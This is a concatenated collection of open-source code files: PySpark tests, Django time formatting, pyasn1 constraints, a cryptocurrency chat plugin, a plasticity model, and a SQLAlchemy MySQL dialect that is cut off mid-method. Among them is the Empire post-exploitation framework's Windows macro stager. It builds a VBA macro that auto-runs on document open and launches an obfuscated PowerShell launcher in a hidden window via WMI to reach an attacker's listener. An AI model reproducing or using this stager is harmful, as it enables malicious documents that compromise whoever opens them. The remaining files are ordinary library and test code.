# These tests are separate because it uses 'spark.sql.queryExecutionListeners' which is
# static and immutable. This can't be set or unset, for example, via `spark.conf`.
@classmethod
def setUpClass(cls):
# Only run if the compiled Scala test listener class is present in the build.
import glob
from pyspark.find_spark_home import _find_spark_home
SPARK_HOME = _find_spark_home()
filename_pattern = (
"sql/core/target/scala-*/test-classes/org/apache/spark/sql/"
"TestQueryExecutionListener.class")
cls.has_listener = bool(glob.glob(os.path.join(SPARK_HOME, filename_pattern)))
if cls.has_listener:
# Note that 'spark.sql.queryExecutionListeners' is a static immutable configuration.
cls.spark = SparkSession.builder \
.master("local[4]") \
.appName(cls.__name__) \
.config(
"spark.sql.queryExecutionListeners",
"org.apache.spark.sql.TestQueryExecutionListener") \
.getOrCreate()
def setUp(self):
if not self.has_listener:
raise self.skipTest(
"'org.apache.spark.sql.TestQueryExecutionListener' is not "
"available. Will skip the related tests.")
@classmethod
def tearDownClass(cls):
if hasattr(cls, "spark"):
cls.spark.stop()
def tearDown(self):
# Reset the JVM-side call flag between tests.
self.spark._jvm.OnSuccessCall.clear()
def test_query_execution_listener_on_collect(self):
self.assertFalse(
self.spark._jvm.OnSuccessCall.isCalled(),
"The callback from the query execution listener should not be called before 'collect'")
self.spark.sql("SELECT * FROM range(1)").collect()
self.spark.sparkContext._jsc.sc().listenerBus().waitUntilEmpty(10000)
self.assertTrue(
self.spark._jvm.OnSuccessCall.isCalled(),
"The callback from the query execution listener should be called after 'collect'")
@unittest.skipIf(
not have_pandas or not have_pyarrow,
pandas_requirement_message or pyarrow_requirement_message) # type: ignore
def test_query_execution_listener_on_collect_with_arrow(self):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": True}):
self.assertFalse(
self.spark._jvm.OnSuccessCall.isCalled(),
"The callback from the query execution listener should not be "
"called before 'toPandas'")
self.spark.sql("SELECT * FROM range(1)").toPandas()
self.spark.sparkContext._jsc.sc().listenerBus().waitUntilEmpty(10000)
self.assertTrue(
self.spark._jvm.OnSuccessCall.isCalled(),
"The callback from the query execution listener should be called after 'toPandas'")
if __name__ == "__main__":
from pyspark.sql.tests.test_dataframe import * # noqa: F401
try:
import xmlrunner # type: ignore
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| apache-2.0 |
ProfessionalIT/professionalit-webiste | sdk/google_appengine/lib/django-1.2/django/utils/timesince.py | 319 | 2698 | import datetime
import time
from django.utils.tzinfo import LocalTimezone
from django.utils.translation import ungettext, ugettext
def timesince(d, now=None):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up to two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
Adapted from http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
# Unit table, largest first; a month is approximated as 30 days and a year
# as 365 days, so results near boundaries are inexact by design.
chunks = (
(60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),
(60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),
(60 * 60 * 24 * 7, lambda n : ungettext('week', 'weeks', n)),
(60 * 60 * 24, lambda n : ungettext('day', 'days', n)),
(60 * 60, lambda n: ungettext('hour', 'hours', n)),
(60, lambda n: ungettext('minute', 'minutes', n))
)
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
# Match the awareness of `d`: aware -> aware "now", naive -> naive "now".
if d.tzinfo:
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
# ignore microsecond part of 'd' since we removed it from 'now'
delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return u'0 ' + ugettext('minutes')
# Find the largest unit with a non-zero count.
for i, (seconds, name) in enumerate(chunks):
count = since // seconds
if count != 0:
break
s = ugettext('%(number)d %(type)s') % {'number': count, 'type': name(count)}
if i + 1 < len(chunks):
# Now get the second item
seconds2, name2 = chunks[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
s += ugettext(', %(number)d %(type)s') % {'number': count2, 'type': name2(count2)}
return s
def timeuntil(d, now=None):
    """
    Like timesince, but returns a string measuring the time until
    the given time.
    """
    if not now:
        # Build a "now" whose tz-awareness matches d (date objects have no
        # tzinfo attribute, hence the getattr default).
        tzinfo = getattr(d, 'tzinfo', None)
        now = datetime.datetime.now(LocalTimezone(d) if tzinfo else None)
    return timesince(now, d)
| lgpl-3.0 |
wisdark/Empire | lib/stagers/windows/macro.py | 12 | 5939 | from lib.common import helpers
import random, string
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Macro',
'Author': ['@enigma0x3', '@harmj0y'],
'Description': ('Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.'),
'Comments': [
'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
obfuscateScript = False
if obfuscate.lower() == "true":
obfuscateScript = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
chunks = list(helpers.chunks(launcher, 50))
payload = "\tDim "+Str+" As String\n"
payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:
payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
macro = "Sub Auto_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub AutoOpen()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub Document_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Public Function "+Method+"() As Variant\n"
macro += payload
macro += "\tConst HIDDEN_WINDOW = 0\n"
macro += "\tstrComputer = \".\"\n"
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
macro += "End Function\n"
return macro
| bsd-3-clause |
achang97/YouTunes | lib/python2.7/site-packages/pyasn1/type/constraint.py | 12 | 7801 | #
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com>
# License: http://pyasn1.sf.net/license.html
#
# Original concept and code by Mike C. Fletcher.
#
import sys
from pyasn1.type import error
__all__ = ['SingleValueConstraint', 'ContainedSubtypeConstraint', 'ValueRangeConstraint',
'ValueSizeConstraint', 'PermittedAlphabetConstraint', 'InnerTypeConstraint',
'ConstraintsExclusion', 'ConstraintsIntersection', 'ConstraintsUnion']
class AbstractConstraint(object):
"""Abstract base-class for constraint objects
Constraints should be stored in a simple sequence in the
namespace of their client Asn1Item sub-classes in cases
when ASN.1 constraint is defined.
"""
def __init__(self, *values):
self._valueMap = set()
self._setValues(values)
# Hash is computed once from the class name plus constraint values.
self.__hash = hash((self.__class__.__name__, self._values))
def __call__(self, value, idx=None):
# An empty constraint accepts everything.
if not self._values:
return
try:
self._testValue(value, idx)
except error.ValueConstraintError:
# Re-raise with the constraint's repr prepended for context.
raise error.ValueConstraintError(
'%s failed at: %r' % (self, sys.exc_info()[1])
)
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join([repr(x) for x in self._values])
)
def __eq__(self, other):
# NOTE(review): identity short-circuits to True; otherwise the stored
# values tuple is compared directly against `other` -- confirm intended.
return self is other and True or self._values == other
def __ne__(self, other):
return self._values != other
def __lt__(self, other):
return self._values < other
def __le__(self, other):
return self._values <= other
def __gt__(self, other):
return self._values > other
def __ge__(self, other):
return self._values >= other
if sys.version_info[0] <= 2:
def __nonzero__(self):
return self._values and True or False
else:
def __bool__(self):
return self._values and True or False
def __hash__(self):
return self.__hash
def _setValues(self, values):
# Hook for subclasses to preprocess the constructor values.
self._values = values
def _testValue(self, value, idx):
raise error.ValueConstraintError(value)
# Constraints derivation logic
def getValueMap(self):
return self._valueMap
def isSuperTypeOf(self, otherConstraint):
# TODO: fix possible comparison of set vs scalars here
return (otherConstraint is self or
not self._values or
otherConstraint == self or
self in otherConstraint.getValueMap())
def isSubTypeOf(self, otherConstraint):
return (otherConstraint is self or
not self or
otherConstraint == self or
otherConstraint in self._valueMap)
class SingleValueConstraint(AbstractConstraint):
    """Constrain a value to one of an explicitly enumerated set of values."""

    def _setValues(self, values):
        self._values = values
        # Keep a set alongside the tuple for O(1) membership tests.
        self._set = set(values)

    def _testValue(self, value, idx):
        if value in self._set:
            return
        raise error.ValueConstraintError(value)
class ContainedSubtypeConstraint(AbstractConstraint):
"""Value must satisfy all of defined set of constraints"""
def _testValue(self, value, idx):
# Delegate to each contained constraint; the first failure propagates.
for c in self._values:
c(value, idx)
class ValueRangeConstraint(AbstractConstraint):
"""Value must be within start and stop values (inclusive)"""
def _testValue(self, value, idx):
if value < self.start or value > self.stop:
raise error.ValueConstraintError(value)
def _setValues(self, values):
# Exactly two values are expected: (start, stop), start <= stop.
if len(values) != 2:
raise error.PyAsn1Error(
'%s: bad constraint values' % (self.__class__.__name__,)
)
self.start, self.stop = values
if self.start > self.stop:
raise error.PyAsn1Error(
'%s: screwed constraint values (start > stop): %s > %s' % (
self.__class__.__name__,
self.start, self.stop
)
)
AbstractConstraint._setValues(self, values)
class ValueSizeConstraint(ValueRangeConstraint):
"""len(value) must be within start and stop values (inclusive)"""
def _testValue(self, value, idx):
# Same bounds logic as the parent, applied to the value's length.
valueSize = len(value)
if valueSize < self.start or valueSize > self.stop:
raise error.ValueConstraintError(value)
# Every element of the value (e.g. every character of a string) must come
# from the permitted alphabet, unlike SingleValueConstraint which tests the
# whole value for membership.
class PermittedAlphabetConstraint(SingleValueConstraint):
def _setValues(self, values):
self._values = values
self._set = set(values)
def _testValue(self, value, idx):
if not self._set.issuperset(value):
raise error.ValueConstraintError(value)
# This is a bit kludgy, meaning two op modes within a single constraint
class InnerTypeConstraint(AbstractConstraint):
"""Value must satisfy type and presence constraints"""
def _testValue(self, value, idx):
# Single-type mode: one constraint applies to any component.
if self.__singleTypeConstraint:
self.__singleTypeConstraint(value)
# Multi-type mode: per-component constraints keyed by index.
elif self.__multipleTypeConstraint:
if idx not in self.__multipleTypeConstraint:
raise error.ValueConstraintError(value)
constraint, status = self.__multipleTypeConstraint[idx]
if status == 'ABSENT': # XXX presence is not checked!
raise error.ValueConstraintError(value)
constraint(value)
def _setValues(self, values):
self.__multipleTypeConstraint = {}
self.__singleTypeConstraint = None
for v in values:
# A tuple value means (index, constraint, presence-status).
if isinstance(v, tuple):
self.__multipleTypeConstraint[v[0]] = v[1], v[2]
else:
self.__singleTypeConstraint = v
AbstractConstraint._setValues(self, values)
# Boolean ops on constraints
class ConstraintsExclusion(AbstractConstraint):
"""Value must not fit the single constraint"""
def _testValue(self, value, idx):
# Inverted logic: success of the inner constraint is our failure.
try:
self._values[0](value, idx)
except error.ValueConstraintError:
return
else:
raise error.ValueConstraintError(value)
def _setValues(self, values):
if len(values) != 1:
raise error.PyAsn1Error('Single constraint expected')
AbstractConstraint._setValues(self, values)
class AbstractConstraintSet(AbstractConstraint):
"""Abstract base for constraint sets: sequence protocol and value-map
plumbing shared by intersection/union subclasses."""
def __getitem__(self, idx):
return self._values[idx]
def __iter__(self):
return iter(self._values)
def __add__(self, value):
# Adding a constraint yields a new set of the same concrete type.
return self.__class__(*(self._values + (value,)))
def __radd__(self, value):
return self.__class__(*((value,) + self._values))
def __len__(self):
return len(self._values)
# Constraints inclusion in sets
def _setValues(self, values):
self._values = values
# Record member constraints (and, transitively, their members) so
# isSuperTypeOf/isSubTypeOf can test derivation.
for constraint in values:
if constraint:
self._valueMap.add(constraint)
self._valueMap.update(constraint.getValueMap())
class ConstraintsIntersection(AbstractConstraintSet):
"""Value must satisfy all constraints"""
def _testValue(self, value, idx):
# First failing member constraint propagates its error.
for constraint in self._values:
constraint(value, idx)
class ConstraintsUnion(AbstractConstraintSet):
"""Value must satisfy at least one constraint"""
def _testValue(self, value, idx):
# Accept on the first member constraint that passes; fail only if all do.
for constraint in self._values:
try:
constraint(value, idx)
except error.ValueConstraintError:
pass
else:
return
raise error.ValueConstraintError(
'all of %s failed for \"%s\"' % (self._values, value)
)
# XXX
# add tests for type check
| mit |
benhoff/plugins | listenerplugins/cryptocurrency.py | 2 | 2829 | """
cryptocurrency.py
A plugin that uses the CoinMarketCap JSON API to get values for cryptocurrencies.
Created By:
- Luke Rogers <https://github.com/lukeroge>
Special Thanks:
- https://coinmarketcap-nexuist.rhcloud.com/
License:
GPL v3
"""
import types
from urllib.parse import quote_plus
from datetime import datetime
import re
import requests
from . import ListenerPlugin
API_URL = "https://coinmarketcap-nexuist.rhcloud.com/api/{}"
# Listener plugin: maps chat triggers ("btc", "dogecoin", ...) onto
# crypto_command lookups against the CoinMarketCap proxy API.
class Cryptocurrency(ListenerPlugin):
def __init__(self):
super().__init__()
self._bitcoin_matches = [re.compile('bitcoin'), re.compile('btc')]
self._litecoin_matches = [re.compile('litecoin'), re.compile('ltc')]
self._doge_matches = [re.compile('dogecoin'), re.compile('doge')]
self.matches = [re.compile('crypto'), re.compile('cryptocurrency')]
self.matches.extend(self._bitcoin_matches)
self.matches.extend(self._litecoin_matches)
self.matches.extend(self._doge_matches)
def __call__(self, regex_command, string_argument):
# Dispatch on which compiled pattern matched; generic "crypto" triggers
# fall through and use the caller-supplied ticker argument instead.
if regex_command in self._bitcoin_matches:
result = crypto_command('btc')
elif regex_command in self._doge_matches:
result = crypto_command("doge")
elif regex_command in self._litecoin_matches:
result = crypto_command("ltc")
else:
result = crypto_command(string_argument)
return result
# main command
def crypto_command(text):
    """ <ticker> -- Returns current value of a cryptocurrency """
    try:
        encoded = quote_plus(text)
        request = requests.get(API_URL.format(encoded))
        request.raise_for_status()
    except requests.exceptions.RequestException as e:
        # RequestException is the common base of HTTPError, ConnectionError,
        # Timeout, TooManyRedirects, ...; the previous narrow tuple let
        # timeouts and redirect failures escape as unhandled exceptions.
        return "Could not get value: {}".format(e)

    data = request.json()

    if "error" in data:
        return "{}.".format(data['error'])

    updated_time = datetime.fromtimestamp(data['timestamp'])
    if (datetime.today() - updated_time).days > 2:
        # the API retains data for old ticker names that are no longer updated
        # in these cases we just return a "not found" message
        return "Currency not found."

    # IRC color codes: green for a positive change, red for negative.
    change = float(data['change'])
    if change > 0:
        change_str = "\x033 {}%\x0f".format(change)
    elif change < 0:
        change_str = "\x035 {}%\x0f".format(change)
    else:
        change_str = "{}%".format(change)

    return "{} // \x0307${:,.2f}\x0f USD - {:,.7f} BTC // {} change".format(data['symbol'].upper(),
                                                                            float(data['price']['usd']),
                                                                            float(data['price']['btc']),
                                                                            change_str)
| gpl-3.0 |
franky88/emperioanimesta | env/Lib/site-packages/pip/_vendor/requests/packages/chardet/compat.py | 2943 | 1157 | ######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
# The "string" types differ per major version: str/unicode on Python 2,
# bytes/str on Python 3.
if sys.version_info < (3, 0):
    base_str = (str, unicode)  # noqa: F821 -- `unicode` exists only on Python 2
else:
    base_str = (bytes, str)


def wrap_ord(a):
    """Return ord(a) for a Python 2 string-like argument; otherwise return
    `a` unchanged (iterating bytes on Python 3 already yields ints)."""
    if sys.version_info >= (3, 0) or not isinstance(a, base_str):
        return a
    return ord(a)
| gpl-3.0 |
andres-erbsen/dename | utils/dbutil.py | 1 | 1803 | # Copyright 2014 The Dename Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
from math import *
from message_pb2 import *
from google.protobuf import text_format
import plyvel
# Render a protobuf message as its text format (unicode) and install it as
# __str__ on the message classes for convenient interactive printing.
def pb2str(pb):
return text_format.MessageToString(pb).decode('utf-8')
SignedServerMessage.__str__ = pb2str
SignedServerMessage.ServerMessage.__str__ = pb2str
def varint(*numbers):
    """Encode each integer as a base-128 varint and concatenate the results.

    Every byte carries 7 payload bits (little-endian groups); the high bit
    is set on a byte whenever further bytes follow.  Note that 0 encodes
    to the empty byte string, matching the original implementation.
    """
    out = bytearray()
    for value in numbers:
        while value:
            continuation = 0x80 if value > 0x7f else 0
            out.append((value & 0x7f) | continuation)
            value >>= 7
    return bytes(out)
def unvarint(bs):
    """Decode a base-128 varint byte string back into an integer.

    Bytes are processed most-significant group last (i.e. the input is
    little-endian by 7-bit groups); continuation bits are simply masked
    off.  The empty byte string decodes to 0.
    """
    value = 0
    for octet in reversed(bs):
        value = (value << 7) | (octet & 0x7f)
    return value
# LevelDB store written by the dename server.
db = plyvel.DB('../server/run')
# list(db.iterator(start=b'M'+varint(1,1), stop=b'M'+varint(1,2)))
# Shorthand deserializers for the two protobuf message types.
ssm = lambda x: SignedServerMessage.FromString(x)
sm = lambda x: SignedServerMessage.ServerMessage.FromString(x)
def SSM(*args):
    # All SignedServerMessages whose b'M'-prefixed varint key starts with
    # *args*; the scan's upper bound is the last component plus one.
    return [ssm(v) for (k,v) in db.iterator(start=b'M'+varint(*args), stop=b'M'+varint(*(list(args[:-1])+[args[-1]+1])))]
def SM(*args):
    # Same range scan as SSM, but unwrap the inner ServerMessage payload.
    return [sm(ssm(v).Message) for (k,v) in db.iterator(start=b'M'+varint(*args), stop=b'M'+varint(*(list(args[:-1])+[args[-1]+1])))]
def O(round):
    # Operations recorded for *round*, stored under key b'O' + varint(round).
    return SignedServerMessage.ServerMessage.OperationsT.FromString(db.get(b'O'+varint(round)))
def Vround():
    # Latest round number, stored as a varint under the literal key b'Vround'.
    return unvarint(db.get(b'Vround'))
| apache-2.0 |
matmodlab/matmodlab2 | matmodlab2/materials/plastic3.py | 1 | 4877 | from numpy import dot, zeros, ix_, sqrt
from ..core.logio import logger
from ..core.material import Material
from ..core.tensor import VOIGT, dyad, deviatoric_part, \
double_dot, magnitude
# Convergence tolerance for the plastic return-mapping Newton loop.
TOLER = 1e-8
# Frequently used square roots, precomputed once at import time.
ROOT3, ROOT2 = sqrt(3.), sqrt(2.)
class HardeningPlasticMaterial(Material):
    """Isotropic J2 plasticity with power-law hardening.

    The yield strength evolves with the equivalent plastic strain as
    Y = Y0 + Y1 * eqps ** m (see :meth:`Y`).  One solution-dependent
    variable is carried: the equivalent plastic strain.
    """
    name = "hardening-plastic"
    def __init__(self, **parameters):
        """Set up the Plastic material.

        Recognized parameters: E, Nu, Y0, Y1, m.  Unrecognized keyword
        arguments are reported and ignored; invalid elastic/yield
        parameters raise ValueError after all errors are logged.
        """
        param_names = ['E', 'Nu', 'Y0', 'Y1', 'm']
        self.params = {}
        for (i, name) in enumerate(param_names):
            self.params[name] = parameters.pop(name, 0.)
        if parameters:
            unused = ', '.join(parameters.keys())
            logger.warning('Unused parameters: {0}'.format(unused))
        # Check inputs
        E = self.params['E']
        Nu = self.params['Nu']
        Y0 = self.params['Y0']
        errors = 0
        if E <= 0.0:
            errors += 1
            logger.error("Young's modulus E must be positive")
        if Nu > 0.5:
            errors += 1
            logger.error("Poisson's ratio > .5")
        if Nu < -1.0:
            errors += 1
            logger.error("Poisson's ratio < -1.")
        if Nu < 0.0:
            # logger.warn is a deprecated alias of logger.warning
            logger.warning("#---- WARNING: negative Poisson's ratio")
        if Y0 < 0:
            errors += 1
            logger.error('Yield strength must be positive')
        if Y0 < 1e-12:
            # zero strength -> assume the user wants elasticity; an
            # (effectively) infinite yield strength keeps the response
            # on the elastic branch of eval().
            logger.warning('Zero strength detected, setting it to a large number')
            self.params['Y0'] = 1e60
        if errors:
            raise ValueError("stopping due to previous errors")
        # At this point, the parameters have been checked. Now request
        # allocation of solution dependent variables. The only variable
        # is the equivalent plastic strain
        self.num_sdv = 1
        self.sdv_names = ['EP_Equiv']
    def Y(self, Y0, Y1, m, eqps):
        """Return the current yield strength Y0 + Y1 * eqps**m.

        The hardening term is skipped for (numerically) zero plastic
        strain to avoid 0**m issues for m < 1.
        """
        Y = Y0
        if eqps > 1e-12:
            Y += Y1 * eqps ** m
        return Y
    def eval(self, time, dtime, temp, dtemp, F0, F,
             stran, d, stress, X, **kwargs):
        """Compute updated stress given strain increment.

        Performs an elastic trial step followed by, if the trial state
        lies outside the yield surface, a radial-return Newton iteration
        for the plastic multiplier Gamma.

        Returns a 3-tuple (stress, X, stiffness) where X holds the
        updated equivalent plastic strain in X[0].
        """
        # material properties
        Y0 = self.params['Y0']
        Y1 = self.params['Y1']
        E = self.params['E']
        Nu = self.params['Nu']
        m = self.params['m']
        if m < 1e-10:
            # if m = 0, assume linear hardening
            m = 1.
        eqps = X[0]
        # Get the bulk, shear, and Lame constants
        K = E / 3. / (1. - 2. * Nu)
        G = E / 2. / (1. + Nu)
        K3 = 3. * K
        G2 = 2. * G
        G3 = 3. * G
        Lam = (K3 - G2) / 3.
        # elastic stiffness (6x6 Voigt form)
        C = zeros((6,6))
        C[ix_(range(3), range(3))] = Lam
        C[range(3),range(3)] += G2
        C[range(3,6),range(3,6)] = G
        # Trial stress
        de = d * dtime
        T = stress + double_dot(C, de)
        # check yield: f <= 0 means the trial state is admissible
        S = deviatoric_part(T)
        RTJ2 = magnitude(S) / ROOT2
        f = RTJ2 - self.Y(Y0, Y1, m, eqps) / ROOT3
        if f <= TOLER:
            # Elastic loading, return what we have computed
            return T, X, C
        # Calculate the flow direction, projection direction
        # (associative flow: M and N coincide)
        M = S / ROOT2 / RTJ2
        N = S / ROOT2 / RTJ2
        A = 2 * G * M
        # Newton iterations to find Gamma
        Gamma = 0
        Ttrial = T.copy()
        for i in range(20):
            # Update all quantities
            dfdy = -1. / ROOT3
            dydG = ROOT2 / ROOT3 * Y1
            hy = ROOT2 / ROOT3 * Y1
            if Y1 > 1e-8 and eqps > 1e-8:
                hy *= m * ((self.Y(Y0, Y1, m, eqps) - Y0) / Y1) ** ((m - 1.) / m)
                dydG *= m * eqps ** (m - 1.)
            dGamma = f * ROOT2 / (double_dot(N, A) - dfdy * dydG)
            Gamma += dGamma
            T = Ttrial - Gamma * A
            S = deviatoric_part(T)
            RTJ2 = magnitude(S) / ROOT2
            eqps += ROOT2 / ROOT3 * dGamma
            f = RTJ2 - self.Y(Y0, Y1, m, eqps) / ROOT3
            # Calculate the flow direction, projection direction
            M = S / ROOT2 / RTJ2
            N = S / ROOT2 / RTJ2
            A = 2 * G * M
            Q = 2 * G * N
            # Converged when the last increment is negligible.
            if abs(dGamma + 1.) < TOLER + 1.:
                break
        else:
            raise RuntimeError('Newton iterations failed to converge')
        # Elastic strain rate and equivalent plastic strain
        dT = T - stress
        dep = Gamma * M
        dee = de - dep
        deqp = ROOT2 / ROOT3 * Gamma
        # Elastoplastic (consistent) stiffness
        H = -2. * dfdy * hy / ROOT2
        D = C - 1 / (double_dot(N, A) + H) * dyad(Q, A)
        # Equivalent plastic strain
        X[0] += deqp
        return T, X, D
| bsd-3-clause |
olivierdalang/stdm | third_party/sqlalchemy/dialects/mysql/mysqlconnector.py | 1 | 5291 | # mysql/mysqlconnector.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: mysql+mysqlconnector
:name: MySQL Connector/Python
:dbapi: myconnpy
:connectstring: mysql+mysqlconnector://<user>:<password>@\
<host>[:<port>]/<dbname>
:url: http://dev.mysql.com/downloads/connector/python/
"""
from .base import (MySQLDialect, MySQLExecutionContext,
MySQLCompiler, MySQLIdentifierPreparer,
BIT)
from ... import util
import re
class MySQLExecutionContext_mysqlconnector(MySQLExecutionContext):
    # Execution context for the MySQL Connector/Python DBAPI.
    def get_lastrowid(self):
        # mysql-connector exposes the last inserted id directly on the cursor.
        return self.cursor.lastrowid
class MySQLCompiler_mysqlconnector(MySQLCompiler):
    """Statement compiler that doubles '%' signs when the driver needs it.

    Older mysql-connector versions format-interpolate statements, so any
    literal percent sign must be escaped as '%%'.
    """

    def visit_mod_binary(self, binary, operator, **kw):
        # Emit the SQL modulo operator, escaped for old drivers.
        op = " %% " if self.dialect._mysqlconnector_double_percents else " % "
        left = self.process(binary.left, **kw)
        right = self.process(binary.right, **kw)
        return left + op + right

    def post_process_text(self, text):
        # Escape literal percent signs in raw SQL text when required.
        if not self.dialect._mysqlconnector_double_percents:
            return text
        return text.replace('%', '%%')

    def escape_literal_column(self, text):
        # Same escaping rule applies to literal column expressions.
        if not self.dialect._mysqlconnector_double_percents:
            return text
        return text.replace('%', '%%')
class MySQLIdentifierPreparer_mysqlconnector(MySQLIdentifierPreparer):
    """Identifier preparer that additionally doubles '%' for old drivers."""

    def _escape_identifier(self, value):
        escaped = value.replace(self.escape_quote, self.escape_to_quote)
        if not self.dialect._mysqlconnector_double_percents:
            return escaped
        # Older mysql-connector format-interpolates statements, so literal
        # percent signs in identifiers must be doubled as well.
        return escaped.replace("%", "%%")
class _myconnpyBIT(BIT):
    # BIT variant for mysql-connector, which converts BIT values itself.
    def result_processor(self, dialect, coltype):
        """Return None: MySQL-connector already converts MySQL BIT values,
        so no additional result processing is required."""
        return None
class MySQLDialect_mysqlconnector(MySQLDialect):
    """MySQL dialect for the MySQL Connector/Python (myconnpy) DBAPI."""
    driver = 'mysqlconnector'
    supports_unicode_binds = True
    supports_sane_rowcount = True
    supports_sane_multi_rowcount = True
    supports_native_decimal = True
    default_paramstyle = 'format'
    execution_ctx_cls = MySQLExecutionContext_mysqlconnector
    statement_compiler = MySQLCompiler_mysqlconnector
    preparer = MySQLIdentifierPreparer_mysqlconnector
    # Let the driver hand BIT values through unconverted.
    colspecs = util.update_copy(
        MySQLDialect.colspecs,
        {
            BIT: _myconnpyBIT,
        }
    )
    @util.memoized_property
    def supports_unicode_statements(self):
        # Connector/Python 2.0+ accepts unicode statements on Python 2 too.
        return util.py3k or self._mysqlconnector_version_info > (2, 0)
    @classmethod
    def dbapi(cls):
        from mysql import connector
        return connector
    def create_connect_args(self, url):
        """Translate a SQLAlchemy URL into (args, kwargs) for connect()."""
        opts = url.translate_connect_args(username='user')
        opts.update(url.query)
